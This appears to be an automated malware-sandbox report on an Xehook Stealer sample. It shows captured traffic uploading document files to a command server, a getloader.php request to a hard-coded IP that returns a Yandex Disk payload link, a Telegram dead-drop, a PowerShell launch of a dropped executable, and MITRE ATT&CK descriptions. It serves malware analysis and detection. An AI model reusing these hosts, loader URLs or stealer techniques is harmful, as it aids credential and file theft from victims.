Sep 5, 2024 14:29:16.197622061 CEST	4944	OUT	Data Raw: 51 54 57 41 53 52 42 4d 4c 43 4d 4c 52 4b 49 47 4d 48 57 52 48 48 48 55 56 5a 54 47 49 46 4e 49 44 42 48 52 4b 4e 46 4f 59 46 49 4f 59 45 52 4d 49 58 46 45 49 41 4e 53 5a 48 56 55 56 42 46 4a 4f 51 4e 4e 4a 47 51 55 4e 44 4c 54 50 4b 52 4d 59 58 Data Ascii: QTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIV
Sep 5, 2024 14:29:16.203358889 CEST	2472	OUT	Data Raw: 54 4e 5a 44 4b 5a 54 4b 44 48 51 51 4a 43 4a 44 54 52 56 4b 4f 43 54 43 58 50 4d 44 4c 4b 53 4f 42 47 5a 53 51 51 55 54 4e 46 59 59 45 4f 43 4a 56 5a 53 5a 55 53 45 53 4f 42 4b 4d 49 4a 53 4b 4b 53 58 54 58 49 54 49 53 4c 42 54 4d 41 4c 41 56 5a Data Ascii: TNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOWAVUUASTLWLLYFQACCDEHSFKRPKY%Y+HFiles/Documents/BNAGMGSPLO.pdf p
Sep 5, 2024 14:29:16.203493118 CEST	4944	OUT	Data Raw: 14 00 00 00 00 00 1c 59 25 59 b4 ff d1 be 02 04 00 00 02 04 00 00 1e 00 48 00 46 69 6c 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 4e 45 42 46 51 51 59 57 50 53 2e 70 64 66 01 00 20 00 00 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Y%YHFiles/Documents/NEBFQQYWPS.pdf \| 333NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZ
Sep 5, 2024 14:29:16.443552017 CEST	25	IN	HTTP/1.1 100 Continue
Sep 5, 2024 14:29:17.602586031 CEST	155	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Sep 2024 12:29:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1 Connection: keep-alive Data Raw: 2b Data Ascii: +
Sep 5, 2024 14:29:17.603239059 CEST	184	OUT	GET /getloader.php?id=208 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36 Host: 65.109.218.88
Sep 5, 2024 14:29:17.911480904 CEST	198	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Sep 2024 12:29:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 43 Connection: keep-alive Data Raw: 68 74 74 70 73 3a 2f 2f 64 69 73 6b 2e 79 61 6e 64 65 78 2e 63 6f 6d 2f 64 2f 68 42 58 35 71 33 37 51 51 79 59 7a 78 77 7c 30 3b Data Ascii: https://disk.yandex.com/d/hBX5q37QQyYzxw\|0;
Sep 5, 2024 14:29:17.912548065 CEST	184	OUT	GET /getloader.php?id=208 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36 Host: 65.109.218.88
Sep 5, 2024 14:29:18.251148939 CEST	198	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Sep 2024 12:29:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 43 Connection: keep-alive Data Raw: 68 74 74 70 73 3a 2f 2f 64 69 73 6b 2e 79 61 6e 64 65 78 2e 63 6f 6d 2f 64 2f 68 42 58 35 71 33 37 51 51 79 59 7a 78 77 7c 30 3b Data Ascii: https://disk.yandex.com/d/hBX5q37QQyYzxw\|0;

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	149.154.167.99	443	7416	C:\Users\user\Desktop\1d0000.MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-05 12:29:11 UTC	196	OUT	GET /+w897k5UK_jIyNDgy HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36 Host: t.me Connection: Keep-Alive
2024-09-05 12:29:12 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 05 Sep 2024 12:29:11 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12255 Connection: close Set-Cookie: stel_ssid=231a591e253418eba5_7390988315737765667; expires=Fri, 06 Sep 2024 12:29:11 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-09-05 12:29:12 UTC	12255	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 4a 6f 69 6e 20 47 72 6f 75 70 20 43 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Join Group Chat</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49709	87.250.250.50	443	7416	C:\Users\user\Desktop\1d0000.MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-05 12:29:19 UTC	81	OUT	GET /d/hBX5q37QQyYzxw HTTP/1.1 Host: disk.yandex.com Connection: Keep-Alive
2024-09-05 12:29:19 UTC	1754	IN	HTTP/1.1 302 Moved temporarily Connection: Close Location: https://disk.yandex.com/showcaptcha?cc=1&mt=1B9EC1EB36A05FF151D32C1291C255F1500AFCBC8AB90758085DF9227726AC5DF767589B56EFFC37550DB79CE4178BF214B7A79EC94CEBB9CBBF785F279D6138B9BD14671EB6979187FEF29FAD20A816ADDB0C25CB64C4D3FFAA8C59CB4FF975F524DF58D9C726EF9DABCAAE8D866F5F1A47031438B1A545D293F7991C7F47EEEC26D69ED127B315A423F122EA467099809922B6B3D6C83F466ADBA00BBB63DBAEC39785A1B3AD4C0BAC55EF822F5E031DD91A07590FEA25724874FC65DBFE456727AA1379E73039462EA25FE978A83D9F7C143FCA8BD34CBAF8A3&retpath=aHR0cHM6Ly9kaXNrLnlhbmRleC5jb20vZC9oQlg1cTM3UVF5WXp4dz8%2C_fdd026a47fe8852ffee1ed3264f80e31&t=2/1725539359/c4cb01981f591db41a3c0be2ede260d6&u=225b0967-11df21d1-b52d8c2e-3de16a9c&s=042fbec079b9900f8a4a25cd2c7bfa1e Set-Cookie: spravka=dD0xNjk0MDAzMzU5O2k9OC40Ni4xMjMuMzM7RD00MUQwM0IzRjU4NTczODUxRTlDQzY4Rjk1NTYzOTNGODc1MkVGNjY3QjdFRjREMzQ5QkU1NzYzMzc3QUVERTJBMkE3RDhGNDc2Rjk2QTUyRDt1PTE2OTQwMDMzNTkyNTk1NTk3NDQ7aD03ZTRhMTU4NDhkYWE5NTRmYzNjNzNhZjE5NWEwYTM5OQ==; domain=.yandex.com; path=/; expires=Sat, 05 Oct 2024 12:29:19 GMT Set-Cookie: _yasc=01OEz9LnDlfz0NXRg5TdksxcQEjS0IEEMeRxBZThmsmy8pHN/Bt/rmjYbpkJvxSG; domain=.yandex.com; path=/; expires=Sun, 03 Sep 2034 12:29:19 GMT; secure Set-Cookie: i=Kk1RCWX8e/zN5MbeEPuhdEeLV9lKVY91kSDAnfN/7XBcVLPltzeugJ79W6D67oghdT2aQQ53pzI3Hs7+khMvHmQOZMo=; Expires=Sat, 05-Sep-2026 12:29:19 GMT; Domain=.yandex.com; Path=/; Secure; HttpOnly Set-Cookie: yandexuid=7039433931725539359; Expires=Sat, 05-Sep-2026 12:29:19 GMT; Domain=.yandex.com; Path=/; Secure Set-Cookie: yashr=2353383881725539359; Path=/; Domain=.yandex.com; Expires=Fri, 05 Sep 2025 12:29:19 GMT; Secure; HttpOnly Transfer-Encoding: chunked X-Yandex-Captcha: captcha X-Yandex-EU-Request: 0
2024-09-05 12:29:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49710	87.250.250.50	443	7416	C:\Users\user\Desktop\1d0000.MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-05 12:29:20 UTC	720	OUT	GET /showcaptcha?cc=1&mt=1B9EC1EB36A05FF151D32C1291C255F1500AFCBC8AB90758085DF9227726AC5DF767589B56EFFC37550DB79CE4178BF214B7A79EC94CEBB9CBBF785F279D6138B9BD14671EB6979187FEF29FAD20A816ADDB0C25CB64C4D3FFAA8C59CB4FF975F524DF58D9C726EF9DABCAAE8D866F5F1A47031438B1A545D293F7991C7F47EEEC26D69ED127B315A423F122EA467099809922B6B3D6C83F466ADBA00BBB63DBAEC39785A1B3AD4C0BAC55EF822F5E031DD91A07590FEA25724874FC65DBFE456727AA1379E73039462EA25FE978A83D9F7C143FCA8BD34CBAF8A3&retpath=aHR0cHM6Ly9kaXNrLnlhbmRleC5jb20vZC9oQlg1cTM3UVF5WXp4dz8%2C_fdd026a47fe8852ffee1ed3264f80e31&t=2/1725539359/c4cb01981f591db41a3c0be2ede260d6&u=225b0967-11df21d1-b52d8c2e-3de16a9c&s=042fbec079b9900f8a4a25cd2c7bfa1e HTTP/1.1 Host: disk.yandex.com
2024-09-05 12:29:20 UTC	778	IN	HTTP/1.1 200 Ok Access-Control-Allow-Origin: yastatic.net Connection: Close Content-Length: 18680 Content-Type: text/html Set-Cookie: _yasc=JOWIWrf/Qn3LWnlF9HBB9YXkeKp+OacRTLv6ZLdfrbIozaMLDmg7z3kX05H0ksajR1Q=; domain=.yandex.com; path=/; expires=Sun, 03 Sep 2034 12:29:20 GMT; secure Set-Cookie: i=JMOvKWhQeET59Pcl7s4sIPUDwwDsfDAoHAXaAKLtcrrmaQkEzHHFF/6mGU2Uk+37p31zf07qu/KYtDjWPmeFA1Bpdc8=; Expires=Sat, 05-Sep-2026 12:29:20 GMT; Domain=.yandex.com; Path=/; Secure; HttpOnly Set-Cookie: yandexuid=2723337421725539360; Expires=Sat, 05-Sep-2026 12:29:20 GMT; Domain=.yandex.com; Path=/; Secure Set-Cookie: yashr=3490323931725539360; Path=/; Domain=.yandex.com; Expires=Fri, 05 Sep 2025 12:29:20 GMT; Secure; HttpOnly X-Yandex-Captcha: captcha X-Yandex-EU-Request: 0
2024-09-05 12:29:20 UTC	16384	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 3e 41 72 65 20 79 6f 75 20 6e 6f 74 20 61 20 72 6f 62 6f 74 Data Ascii: <!doctype html><html prefix="og: http://ogp.me/ns#" lang="en"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title data-react-helmet="true">Are you not a robot
2024-09-05 12:29:20 UTC	2296	IN	Data Raw: 42 45 42 34 31 34 32 38 30 34 45 45 44 35 46 42 45 45 38 42 43 42 39 39 42 33 33 36 34 36 44 30 35 44 30 42 36 31 42 41 44 43 30 39 44 31 41 35 41 36 46 42 39 33 35 45 42 32 41 31 39 31 43 44 38 36 30 30 34 42 33 42 38 35 41 37 38 32 32 42 44 30 35 42 35 34 46 41 30 30 41 45 31 36 38 33 41 38 38 38 44 36 31 31 38 39 43 37 33 36 44 36 32 42 41 37 39 42 42 32 46 46 38 38 33 31 41 36 32 31 38 37 37 30 32 32 37 37 39 42 44 37 34 35 44 30 36 37 36 41 38 35 36 36 30 34 32 39 37 42 34 33 34 43 34 44 31 35 43 45 42 44 31 46 42 41 45 34 42 45 30 34 41 39 42 42 35 35 45 46 31 41 36 43 33 46 43 42 30 38 43 30 31 26 72 65 74 70 61 74 68 3d 61 48 52 30 63 48 4d 36 4c 79 39 6b 61 58 4e 72 4c 6e 6c 68 62 6d 52 6c 65 43 35 6a 62 32 30 76 5a 43 39 6f 51 6c 67 31 63 54 4d Data Ascii: BEB4142804EED5FBEE8BCB99B33646D05D0B61BADC09D1A5A6FB935EB2A191CD86004B3B85A7822BD05B54FA00AE1683A888D61189C736D62BA79BB2FF8831A621877022779BD745D0676A856604297B434C4D15CEBD1FBAE4BE04A9BB55EF1A6C3FCB08C01&retpath=aHR0cHM6Ly9kaXNrLnlhbmRleC5jb20vZC9oQlg1cTM

Target ID:	0
Start time:	08:29:09
Start date:	05/09/2024
Path:	C:\Users\user\Desktop\1d0000.MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\1d0000.MSBuild.exe"
Imagebase:	0x1c2541e0000
File size:	154'624 bytes
MD5 hash:	41CF033D05AE0E2C5238A7932CF2DC77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_xehookStealer_1, Description: Yara detected Xehook Stealer, Source: 00000000.00000000.1395699284.000001C2541E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_xehookStealer_1, Description: Yara detected Xehook Stealer, Source: 00000000.00000002.1527801649.000001C255E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:29:20
Start date:	05/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:29:20
Start date:	05/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFB4AE20906 Relevance: 1.8, Strings: 1, Instructions: 512COMMON

Download Yara Rule

Strings

pdJ, xrefs: 00007FFB4AE211C9

Memory Dump Source

Source File: 00000000.00000002.1530496605.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ae10000_1d0000.jbxd

Similarity

API ID:
String ID: pdJ
API String ID: 0-1362030039
Opcode ID: c42c350f9698ed82817da7585c40b989cfe127e494c3b9c7623eefdd8269357e
Instruction ID: c6aea728edf0bce228b4ac1e6a51f877519f865c3fdfd9e8fd0fed03d80c810d
Opcode Fuzzy Hash: c42c350f9698ed82817da7585c40b989cfe127e494c3b9c7623eefdd8269357e
Instruction Fuzzy Hash: F40290B195CA0A8BF759BE64C561379B395FF88304F7041BDD42E861C2DE2AEC42C782

Function 00007FFB4AE25D62 Relevance: 1.8, APIs: 1, Instructions: 254encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 00007FFB4AE25F23

Memory Dump Source

Source File: 00000000.00000002.1530496605.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ae10000_1d0000.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 210a68bd5c7325f08c0f53768719486f40ce7a66c3eab3658f8307abc6bc2259
Instruction ID: 414ddfb46cf23f39b5c850999260a4d3f4edf11d97d42716a1362357b69b62e1
Opcode Fuzzy Hash: 210a68bd5c7325f08c0f53768719486f40ce7a66c3eab3658f8307abc6bc2259
Instruction Fuzzy Hash: 8581E47190CA4D8FEB99EF28D8457E877E0FB58310F1042AAD44DD3292DE34A985CB91

Function 00007FFB4AE182A2 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1530496605.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ae10000_1d0000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7647de55a289228267ec041796d1da8680ada79d7afef9147318194c9b0c3ba0
Instruction ID: e1c105abec102af09519e809a3f83cd8124dd29dc75b22464232138ae39de5c7
Opcode Fuzzy Hash: 7647de55a289228267ec041796d1da8680ada79d7afef9147318194c9b0c3ba0
Instruction Fuzzy Hash: 55E1B27090CA4E8FEBA8EF38C8557F97BD1FB54310F24426AD85DC7291DE7898458B82

Function 00007FFB4AE1753F Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1530496605.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ae10000_1d0000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec7f3de44ea20e79c40ee4b27c5c4bd787619a09289637058d1b0f7e8542f81
Instruction ID: de75f841db89200e52b4c9140c6b3a1a4b0d93b520b6b1f147913cb0346bc323
Opcode Fuzzy Hash: dec7f3de44ea20e79c40ee4b27c5c4bd787619a09289637058d1b0f7e8542f81
Instruction Fuzzy Hash: 8EE193B091CA4E8FEBA8EF28C8457F977D1FB54301F60426AE85EC7291DF3499458B81

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
